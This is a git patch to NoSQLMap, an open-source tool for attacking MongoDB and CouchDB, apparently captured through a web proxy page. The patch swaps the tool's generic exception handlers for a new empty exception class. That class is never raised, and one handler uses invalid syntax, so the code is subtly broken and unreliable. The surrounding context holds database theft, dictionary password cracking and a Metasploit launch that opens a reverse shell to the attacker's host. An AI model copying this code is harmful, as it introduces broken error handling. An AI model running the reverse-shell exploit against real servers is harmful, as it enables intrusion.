From e0bf5a45cb007d7cb82f4a0d67851964718031df Mon Sep 17 00:00:00 2001 From: Ben Date: Wed, 8 Apr 2020 18:41:10 -0400 Subject: [PATCH] Added base exception class NoSQLMapException inside exception.py. --- exception.py | 6 ++++++ nosqlmap.py | 3 ++- nsmcouch.py | 21 +++++++++++---------- nsmmongo.py | 29 +++++++++++++++-------------- nsmscan.py | 7 ++++--- nsmweb.py | 11 ++++++----- 6 files changed, 44 insertions(+), 33 deletions(-) create mode 100644 exception.py diff --git a/exception.py b/exception.py new file mode 100644 index 0000000..72659c8 --- /dev/null +++ b/exception.py @@ -0,0 +1,6 @@ +#!/usr/bin/python +# NoSQLMap Copyright 2012-2017 NoSQLMap Development team +# See the file 'doc/COPYING' for copying permission + +class NoSQLMapException(Exception): + pass diff --git a/nosqlmap.py b/nosqlmap.py index 0f70ab4..1aac75d 100755 --- a/nosqlmap.py +++ b/nosqlmap.py @@ -3,6 +3,7 @@ # NoSQLMap Copyright 2012-2017 NoSQLMap Development team # See the file 'doc/COPYING' for copying permission +from exception import NoSQLMapException import sys import nsmcouch import nsmmongo @@ -279,7 +280,7 @@ def options(): print "Bad octet in IP address." goodDigits = False - except: + except NoSQLMapException("[!] Must be a DNS name."): #Must be a DNS name (for now) notDNS = False diff --git a/nsmcouch.py b/nsmcouch.py index f2d344b..33bbe62 100644 --- a/nsmcouch.py +++ b/nsmcouch.py @@ -2,6 +2,7 @@ # NoSQLMap Copyright 2012-2017 NoSQLMap Development team # See the file 'doc/COPYING' for copying permission +from exception import NoSQLMapException import couchdb import urllib import requests @@ -39,10 +40,10 @@ def couchScan(target,port,pingIt): except couchdb.http.Unauthorized: return [1,None] - except: + except NoSQLMapException: return [2,None] - except: + except NoSQLMapException: return [3,None] else: @@ -59,10 +60,10 @@ def couchScan(target,port,pingIt): except couchdb.http.Unauthorized: return [1,None] - except: + except NoSQLMapException: return [2,None] - except: + except NoSQLMapException: return [3,None] def netAttacks(target,port, myIP, args = None): @@ -92,7 +93,7 @@ def netAttacks(target,port, myIP, args = None): print "CouchDB authenticated on " + target + ":" + str(port) mgtOpen = True - except: + except NoSQLMapException: raw_input("Failed to authenticate. Press enter to continue...") return @@ -113,7 +114,7 @@ def netAttacks(target,port, myIP, args = None): if mgtRespCode == 200: print "Sofa web management open at " + mgtUrl + ". No authentication required!" - except: + except NoSQLMapException: print "Sofa web management closed or requires authentication." if mgtOpen == True: @@ -152,7 +153,7 @@ def getPlatInfo(couchConn, target): return -def enumAtt(conn,target): +def enumAtt(conn, target, port): dbList = [] print "Enumerating all attachments..." @@ -179,7 +180,7 @@ def enumDbs (couchConn,target,port): print "\n".join(dbList) print "\n" - except: + except NoSQLMapException: print "Error: Couldn't list databases. The provided credentials may not have rights." if '_users' in dbList: @@ -253,7 +254,7 @@ def stealDBs (myDB,couchConn,target,port): else: return - except: + except NoSQLMapException: raw_input ("Something went wrong. Are you sure your CouchDB is running and options are set? Press enter to return...") return @@ -343,7 +344,7 @@ def dict_pass(key,salt,dbVer): passList = f.readlines() loadCheck = True - except: + except NoSQLMapException: print " Couldn't load file." print "Running dictionary attack..." diff --git a/nsmmongo.py b/nsmmongo.py index ee61e02..996668a 100644 --- a/nsmmongo.py +++ b/nsmmongo.py @@ -2,6 +2,7 @@ # NoSQLMap Copyright 2012-2017 NoSQLMap Development team # See the file 'doc/COPYING' for copying permission +from exception import NoSQLMapException import pymongo import urllib import json @@ -49,7 +50,7 @@ def netAttacks(target, dbPort, myIP, myPort, args = None): conn = pymongo.MongoClient(target) print "MongoDB authenticated on " + target + ":27017!" mgtOpen = True - except: + except NoSQLMapException: raw_input("Failed to authenticate. Press enter to continue...") return @@ -91,7 +92,7 @@ def netAttacks(target, dbPort, myIP, myPort, args = None): print "REST interface not enabled." print "\n" - except Exception, e: + except NoSQLMapException: print "MongoDB web management closed or requires authentication." if mgtOpen == True: @@ -180,7 +181,7 @@ def stealDBs(myDB,victim,mongoConn): else: return - except Exception, e: + except NoSQLMapException, e: if str(e).find('text search not enabled') != -1: raw_input("Database copied, but text indexing was not enabled on the target. Indexes not moved. Press enter to return...") return @@ -231,7 +232,7 @@ def dict_pass(user,key): with open (dictionary) as f: passList = f.readlines() loadCheck = True - except: + except NoSQLMapException: print " Couldn't load file." print "Running dictionary attack..." @@ -303,7 +304,7 @@ def enumDbs (mongoConn): print "\n".join(mongoConn.database_names()) print "\n" - except: + except NoSQLMapException: print "Error: Couldn't list databases. The provided credentials may not have rights." print "List of collections:" @@ -328,7 +329,7 @@ def enumDbs (mongoConn): if crack in yes_tag: passCrack(users[x]['user'],users[x]['pwd']) - except Exception, e: + except NoSQLMapException, e: print e print "Error: Couldn't list collections. The provided credentials may not have rights." @@ -336,11 +337,11 @@ def enumDbs (mongoConn): return -def msfLaunch(): +def msfLaunch(victim, myIP, myPort): try: proc = subprocess.call(["msfcli", "exploit/linux/misc/mongod_native_helper", "RHOST=%s" % victim, "DB=local", "PAYLOAD=linux/x86/shell/reverse_tcp", "LHOST=%s" % myIP, "LPORT=%s" % myPort, "E"]) - except: + except NoSQLMapException: print "Something went wrong. Make sure Metasploit is installed and path is set, and all options are defined." raw_input("Press enter to continue...") return @@ -357,10 +358,10 @@ def enumGrid (mongoConn): print " list of files:" print "\n".join(files) - except: + except NoSQLMapException: print "GridFS not enabled on " + str(dbItem) + "." - except: + except NoSQLMapException: print "Error: Couldn't enumerate GridFS. The provided credentials may not have rights." return @@ -381,7 +382,7 @@ def mongoScan(ip,port,pingIt): conn.close() return [0,dbVer] - except: + except NoSQLMapException: if str(sys.exc_info()).find('need to login') != -1: conn.close() return [1,None] @@ -390,7 +391,7 @@ def mongoScan(ip,port,pingIt): conn.close() return [2,None] - except: + except NoSQLMapException: return [3,None] else: @@ -405,7 +406,7 @@ def mongoScan(ip,port,pingIt): conn.close() return [0,dbVer] - except Exception, e: + except NoSQLMapException, e: if str(e).find('need to login') != -1: conn.close() return [1,None] @@ -414,5 +415,5 @@ def mongoScan(ip,port,pingIt): conn.close() return [2,None] - except: + except NoSQLMapException: return [3,None] diff --git a/nsmscan.py b/nsmscan.py index 06cb044..b292aad 100644 --- a/nsmscan.py +++ b/nsmscan.py @@ -3,6 +3,7 @@ # See the file 'doc/COPYING' for copying permission +from exception import NoSQLMapException import ipcalc import nsmmongo import nsmcouch @@ -41,7 +42,7 @@ def massScan(platform, args = None): for ip in ipcalc.Network(subnet): ipList.append(str(ip)) optCheck = False - except: + except NoSQLMapException: raw_input("Not a valid subnet. Press enter to return to main menu.") return @@ -54,7 +55,7 @@ def massScan(platform, args = None): ipList = f.readlines() loadCheck = True optCheck = False - except: + except NoSQLMapException: print "Couldn't open file." if loadOpt == "3": @@ -119,7 +120,7 @@ def massScan(platform, args = None): print "Scan results saved!" select = False - except: + except NoSQLMapException: print "Couldn't save scan results." elif saveEm in no_tag: diff --git a/nsmweb.py b/nsmweb.py index e2fcc77..0b5a8f9 100644 --- a/nsmweb.py +++ b/nsmweb.py @@ -3,6 +3,7 @@ # See the file 'doc/COPYING' for copying permission +from exception import NoSQLMapException import urllib import urllib2 import string @@ -106,7 +107,7 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders, args = None): else: print "Got " + str(appRespCode) + "from the app, check your options." - except Exception,e: + except NoSQLMapException,e: print e print "Looks like the server didn't respond. Check your options." @@ -445,7 +446,7 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders, args = None) else: print "Got " + str(appRespCode) + "from the app, check your options." - except Exception,e: + except NoSQLMapException,e: print e print "Looks like the server didn't respond. Check your options." @@ -464,7 +465,7 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders, args = None) injIndex = int(args.injectedParameter) injOpt = str(postData.keys()[int(injIndex)-1]) print "Injecting the " + injOpt + " parameter..." - except: + except NoSQLMapException: if args == None: raw_input("Something went wrong. Press enter to return to the main menu...") return @@ -909,7 +910,7 @@ def buildUri(origUri, randValue, args=None): split_uri = origUri.split("?") params = split_uri[1].split("&") - except: + except NoSQLMapException: raw_input("Not able to parse the URL and parameters. Check options settings. Press enter to return to main menu...") return @@ -938,7 +939,7 @@ def buildUri(origUri, randValue, args=None): for params in injOpt: print "Injecting the " + params + " parameter..." - except Exception: + except NoSQLMapException: raw_input("Something went wrong. Press enter to return to the main menu...") return pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy